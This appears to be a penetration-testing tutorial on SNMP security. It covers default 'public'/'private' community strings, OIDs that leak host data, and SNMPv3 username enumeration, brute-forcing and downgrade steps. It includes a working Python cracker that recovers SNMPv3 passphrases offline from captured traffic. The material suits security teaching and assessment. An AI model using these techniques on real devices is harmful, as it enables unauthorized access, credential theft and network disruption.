SNMP Versions Explained
SNMP has three main versions:
Version | Security Level | Description |
---|---|---|
v1 | 🟥 Insecure | Original protocol: community-string access, every packet in plaintext, 32-bit counters only |
v2c | 🟥 Insecure | Adds GetBulk and 64-bit counters, but still community strings and plaintext |
v3 | ✅ Secure | User-based security model with authentication and optional encryption |
SNMP v1 and v2c
- These use community strings as simple shared passwords, sent in plaintext in every packet.
- There is no encryption: anyone on the path can read the data and the community string itself.
- The access level (read-only or read-write) is tied to which string you present; there is no per-user identity.
Community strings:
String | Access Type | Default Value |
---|---|---|
public | Read-only | Common factory default |
private | Read-write | Common factory default, often left as-is |
✅ If a device accepts `public`, you can read values.
🔥 If a device accepts `private`, you can change settings with `snmpset` (for example set an interface's `ifAdminStatus` to down), disable interfaces, or worse.
Note: Many SNMP services still ship with both `public` and `private` as defaults, and admins often forget to change or disable them.
SNMP v3
SNMPv3 was introduced to address the security problems of v1 and v2c.
Instead of community strings, SNMPv3 uses:
- User-based access (the User-based Security Model, USM: a username with separate authentication and privacy passphrases)
- Optional authentication (HMAC with MD5 or SHA) and encryption (DES or AES), selected by the security level
- Three security levels:
Level | Description |
---|---|
noAuthNoPriv | No authentication, no encryption; only a username, so comparable to v2c |
authNoPriv | Authentication (HMAC keyed from the auth passphrase), but the payload is still plaintext |
authPriv | Authentication plus encryption (most secure) |
SNMPv3 example (net-snmp syntax: `-A` is the authentication passphrase, `-X` the privacy passphrase, and `-l` must match the level the agent is configured for):
```bash
snmpwalk -v3 -u snmpuser -a SHA -A password123 -x AES -X encryptkey -l authPriv 192.168.1.1
```
For a pentester, SNMPv3 is usually a dead end unless:
- You can guess or brute-force the username and password. USM answers "Unknown user name" for a bad username and "Authentication failure" for a bad password, so valid usernames can be enumerated before any password guessing.
- The device still accepts v1/v2c alongside v3, so you can simply downgrade to a community string.
- It runs at noAuthNoPriv, or you can capture authenticated traffic and crack the passphrase offline against the HMAC.
Summary: SNMP Access Controls
Version | Access Mechanism | Security | Pentester Feasibility |
---|---|---|---|
v1 | `public`, `private` | None | Very high |
v2c | `public`, `private` | None | Very high |
v3 | Users/passwords | Strong | Low (unless creds leak) |
What is an OID (Object Identifier)?
Think of the MIB as a database schema that describes each value, and OIDs as the keys you query.
Every piece of SNMP-exposed information has a unique OID, like:
1.3.6.1.2.1.1.5.0 → sysName (hostname)
The full OID path works like a file-system path or a JSON tree: each number selects a child of the previous node.
Here's a simplified view:
```text
1 iso
└─ 3 org
   └─ 6 dod
      └─ 1 internet
         └─ 2 mgmt
            └─ 1 mib-2
               └─ 1 system
                  └─ 5 sysName
                     └─ 0 (instance index)
```
That's how we get:
1.3.6.1.2.1.1.5.0 = sysName.0 (hostname)
The trailing `.0` is the instance index. Scalar objects such as `sysName` have exactly one instance, always `.0`; columns of a table (for example `ifDescr`, 1.3.6.1.2.1.2.2.1.2) have one instance per row, so you walk them instead: `ifDescr.1`, `ifDescr.2`, and so on.
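To make both points concrete (the community string travels in plaintext, and an OID is just a dotted path packed into bytes), here is a hand-built SNMPv1/v2c GetRequest encoder and response decoder. This is an added example, not code from the original article or from any SNMP tool. The reply, the hostname `core-sw01` and the request ID `0x1234` are constructed for the demo; nothing is sent on the network. To query a real agent you would `sendto()` the bytes from `build_get()` to UDP port 161 and hand the returned datagram to `parse_message()`.

```python
"""Hand-rolled SNMPv1/v2c BER encoder and decoder (added example, offline only)."""
import secrets

# ASN.1 universal tags and the SNMP context-specific PDU tags used here
INTEGER, OCTET_STRING, NULL, OID, SEQUENCE = 0x02, 0x04, 0x05, 0x06, 0x30
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2
VERSION = {"v1": 0, "v2c": 1}   # value of the version field on the wire


def ber_len(n):
    """BER length: one byte below 128, otherwise 0x80|count followed by the bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, content):
    return bytes([tag]) + ber_len(len(content)) + content


def encode_int(v):
    """Two's-complement INTEGER in the minimal number of bytes."""
    length = 1
    while not -(1 << (8 * length - 1)) <= v < (1 << (8 * length - 1)):
        length += 1
    return tlv(INTEGER, v.to_bytes(length, "big", signed=True))


def encode_oid(dotted):
    """'1.3.6.1.2.1.1.5.0' -> 06 08 2b 06 01 02 01 01 05 00."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])      # first two arcs share one byte
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]                        # base-128, high bit = "more follows"
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return tlv(OID, bytes(out))


def decode_oid(content):
    """Inverse of encode_oid, given the OID content bytes (tag and length stripped)."""
    first = min(content[0] // 40, 2)
    arcs, value = [first, content[0] - 40 * first], 0
    for b in content[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))


def _message(community, pdu_tag, request_id, varbinds, version):
    pdu = tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0)
              + tlv(SEQUENCE, varbinds))
    # The community string is a plain OCTET STRING right after the version: no secrecy at all.
    return tlv(SEQUENCE, encode_int(VERSION[version])
               + tlv(OCTET_STRING, community.encode()) + pdu)


def build_get(community, oids, version="v2c", request_id=None):
    """GetRequest for one or more OIDs; values are NULL placeholders the agent fills in."""
    if request_id is None:
        request_id = secrets.randbelow(1 << 31)
    varbinds = b"".join(tlv(SEQUENCE, encode_oid(o) + tlv(NULL, b"")) for o in oids)
    return _message(community, GET_REQUEST, request_id, varbinds, version)


def build_response(community, request_id, bindings, version="v2c"):
    """Constructed agent reply for the offline demo (same layout a real agent uses)."""
    varbinds = b"".join(tlv(SEQUENCE, encode_oid(o) + tlv(OCTET_STRING, v)) for o, v in bindings)
    return _message(community, GET_RESPONSE, request_id, varbinds, version)


def parse_tlv(buf, pos=0):
    """Return (tag, content, position after this element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                               # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_children(content):
    items, pos = [], 0
    while pos < len(content):
        tag, body, pos = parse_tlv(content, pos)
        items.append((tag, body))
    return items


def parse_message(packet):
    """Decode a v1/v2c message into version, community and (oid, value tag, value) triples."""
    tag, msg, _ = parse_tlv(packet)
    if tag != SEQUENCE:
        raise ValueError("not an SNMP message")
    (_, ver), (_, community), (pdu_tag, pdu) = parse_children(msg)
    rid, err_status, _err_index, varbind_list = parse_children(pdu)
    varbinds = []
    for _, vb in parse_children(varbind_list[1]):
        (_, oid_body), (vtag, value) = parse_children(vb)
        varbinds.append((decode_oid(oid_body), vtag, value))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": community.decode(errors="replace"),
            "pdu_type": pdu_tag,
            "request_id": int.from_bytes(rid[1], "big", signed=True),
            "error_status": int.from_bytes(err_status[1], "big", signed=True),
            "varbinds": varbinds}


if __name__ == "__main__":
    SYSNAME = "1.3.6.1.2.1.1.5.0"
    request = build_get("public", [SYSNAME], request_id=0x1234)
    print("on the wire:", request.hex())
    print("community readable in raw bytes:", b"public" in request)
    reply = build_response("public", 0x1234, [(SYSNAME, b"core-sw01")])   # constructed reply
    print("decoded reply:", parse_message(reply)["varbinds"])
```

`parse_message()` is exactly what a sniffer does with a captured datagram: the version byte, the community string and every OID fall straight out of the BER structure, which is why a single captured v1/v2c packet hands an attacker the read or write credential.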
Common High-Value OIDs for Pentesters
OID | Info Leaked |
---|---|
1.3.6.1.2.1.1.5.0 | Hostname (`sysName`) |
1.3.6.1.2.1.1.3.0 | Uptime (`sysUpTime`) |
1.3.6.1.2.1.25.1.5.0 | Number of logged-in users (`hrSystemNumUsers`) |
1.3.6.1.2.1.25.1.6.0 | Number of running processes (`hrSystemProcesses`) |
1.3.6.1.2.1.4.20.1.1 | IP addresses on interfaces (`ipAdEntAddr`) |
1.3.6.1.2.1.4.22.1.2 | ARP table, MAC address per IP (`ipNetToMediaPhysAddress`): internal network discovery |
1.3.6.1.2.1.25.4.2.1.2 | Running process names (`hrSWRunName`) |
1.3.6.1.2.1.25.6.3.1.2 | Installed software (`hrSWInstalledName`) |
1.3.6.1.2.1.2.2.1.2 | Interface names (`ifDescr`) |
Only the first four end in `.0` and can be fetched with `snmpget`; the rest are table columns with one instance per row, so `snmpwalk` them.
What to Do If You Find SNMP v3
- Check for fallback support:
Some systems run both SNMPv3 and v2c. Try: `snmpwalk -v2c -c public 192.168.1.1`
- Brute-force v3 credentials (rarely practical online):
`onesixtyone` only guesses v1/v2c community strings, and `snmpenum` and `snmp-check` are enumerators for once you already have access. For v3, enumerate usernames first (the agent answers "Unknown user name" for an invalid one) and then loop `snmpwalk -v3 -u <user> -l authNoPriv -a SHA -A <candidate>` over a wordlist; expect it to be slow, since every attempt is a round trip to the device.
- Sniff SNMPv3 traffic:
If it is configured with noAuthNoPriv, v3 still leaks everything in plaintext. authNoPriv also sends the PDU in the clear; it only adds an HMAC, so a capture gives you both the data and the material to crack the passphrase offline.
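The security levels above and the brute-force and sniffing points rest on how SNMPv3's USM turns a passphrase into a key and tags each message. The block below is an added example, not code from the article or from net-snmp: it implements the RFC 3414 key derivation (password stretched to 1 MiB, hashed, then localized with the agent's engine ID) and the HMAC-96 check, and goes one step beyond the page's online brute-force by showing the offline variant against a captured authNoPriv message. The engine ID `8000000001c0a80101`, the user `snmpuser`, the passphrase `password123` (taken from the snmpwalk example above), the wordlist and the `make_capture()` layout are all constructed for the demo; a real message is BER-encoded and you would locate the 12-byte `msgAuthenticationParameters` field by parsing it, but the HMAC is computed the same way, over the whole message with that field zeroed.

```python
"""SNMPv3 USM key localization (RFC 3414 A.2) and offline auth-tag cracking (added example)."""
import hashlib
import hmac

MEGABYTE = 1_048_576     # RFC 3414: hash exactly 1 MiB of the password repeated cyclically
TAG_LEN = 12             # HMAC-MD5-96 / HMAC-SHA-96 truncation (SHA-2 variants use longer tags)


def password_to_key(password, engine_id, hash_name="sha1"):
    """Ku = H(password repeated to 1 MiB); Kul = H(Ku || engineID || Ku)."""
    pw = password.encode()
    ku = hashlib.new(hash_name, (pw * (MEGABYTE // len(pw) + 1))[:MEGABYTE]).digest()
    return hashlib.new(hash_name, ku + engine_id + ku).digest()


def auth_tag(localized_key, msg, params_offset, hash_name="sha1"):
    """Sender's tag: HMAC over the whole message with the 12-byte auth field zeroed."""
    zeroed = msg[:params_offset] + bytes(TAG_LEN) + msg[params_offset + TAG_LEN:]
    return hmac.new(localized_key, zeroed, hash_name).digest()[:TAG_LEN]


def crack(msg, params_offset, engine_id, candidates, hash_name="sha1"):
    """Offline brute force: re-derive the localized key per candidate and compare tags."""
    observed = msg[params_offset:params_offset + TAG_LEN]
    for pw in candidates:
        key = password_to_key(pw, engine_id, hash_name)
        if hmac.compare_digest(auth_tag(key, msg, params_offset, hash_name), observed):
            return pw
    return None


# Constructed "capture" for the demo: a simplified layout, not real BER (assumed values).
ENGINE_ID = bytes.fromhex("8000000001c0a80101")


def make_capture(password, user, scoped_pdu, engine_id=ENGINE_ID):
    """Return (message, offset of the auth field) the way a sniffer would see an authNoPriv message."""
    header = b"\x30" + engine_id + user.encode() + b"\x00"
    offset = len(header)
    msg = header + bytes(TAG_LEN) + scoped_pdu      # tag placeholder, then the plaintext PDU
    tag = auth_tag(password_to_key(password, engine_id), msg, offset)
    return msg[:offset] + tag + msg[offset + TAG_LEN:], offset


if __name__ == "__main__":
    msg, off = make_capture("password123", "snmpuser", b"get sysName.0")
    print("scoped PDU still readable at authNoPriv:", b"sysName" in msg)
    print("cracked passphrase:", crack(msg, off, ENGINE_ID, ["public", "Summer2024", "password123"]))
```

Two practical notes: the 1 MiB hash per candidate is the only cost, so a wordlist attack on a capture is limited by your CPU rather than by the device; and because the key is localized with the engine ID, the same passphrase yields a different key on every agent, so a cracked key from one device does not transfer, but the passphrase does.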
Final Summary
- SNMPv1/v2c use `public` and `private` strings with no encryption: perfect for passive enumeration
- SNMPv3 replaces this with usernames, authentication, and optional encryption
- Community strings are like shared passwords. If you find `private`, you're in control.
- OIDs are how you ask for specific data: learn the useful ones and use them with `snmpwalk`, `snmpget`, and `snmpset`